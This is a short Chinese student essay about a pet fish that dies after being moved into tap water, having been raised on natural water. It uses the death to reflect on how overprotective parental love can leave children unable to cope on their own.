刚到新居的`小鱼,可能不适应环境,像个害羞的小姑娘,藏在水草里不肯出来。晚上,我放了一些鱼食给小鱼们吃,它们吃得津津有味。可是,天有不测风云,鱼有旦夕祸福。住进新居的小鱼,第二天早晨我就看不见它的身影了,东找西寻,终于看见小鱼在沙石上静静地躺着,睁着圆圆的眼睛。哦,它死了,死得好悲惨!
我纳闷极了,昨天尽管小鱼对其它鱼儿很陌生,但也在水草间游得欢快呀!今咋变成这样?是被其它鱼咬死的吗?不,它们怎么会去咬呢?就是去咬,小鱼那么灵巧,它们也咬不到。是被饿死的?不,昨天晚上我刚给它们喂过饲料,它也吃得津津有味呢!就算是食物中毒,那其它的鱼儿怎么没中毒?
后来,我终于从爷爷那儿得知,爷爷怕自来水中的漂白粉对小鱼有害,就专用天然水,可我的鱼缸里却直接使用了自来水,小鱼被爷爷娇惯了,不能适应这种自来水,当然要死亡。
没想到,爷爷的关爱却害死了小鱼!
其实,在生活中也有着这些“爱心杀手”。几天前,我在报纸上就看到了这么一则消息:一位母亲不惜花去一个月的工资乘飞机去北京给刚念大学的儿子送馄饨,只因为儿子太想家了。那位母亲还准备寓居北京,专门给儿子洗衣、做饭。看到这里,我真的敬佩这位母亲,可同时我又想,在这位母亲的关爱下,她的大学生儿子能独立生活吗?会不会也像我的小鱼儿一样,因不适应新的生活环境而遭淘汰呢?
文档为doc格式